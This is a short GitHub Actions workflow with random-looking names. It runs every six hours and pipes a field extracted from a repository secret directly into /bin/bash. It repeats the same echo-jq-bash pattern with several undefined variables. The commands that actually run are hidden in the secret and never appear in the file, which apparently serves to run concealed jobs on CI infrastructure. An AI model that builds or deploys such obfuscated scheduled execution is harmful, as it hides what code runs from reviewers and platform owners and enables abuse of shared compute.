name: shizuniao3289

on:
  workflow_dispatch:
  schedule:
    - cron: '14 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shizuniao3289
        env:
          oay9: ${{ secrets.oay9 }}
        run: |
          echo $oay9 | jq -r .qa2 | /bin/bash
          echo $lyw814 | jq -r .qyo9681 | /bin/bash
          echo $zk651 | jq -r .alzhm598 | /bin/bash
          echo $gb446 | jq -r .v86 | /bin/bash
          echo $ijyw91 | jq -r .f52852 | /bin/bash
          echo $cdygy30 | jq -r .vs38 | /bin/bash

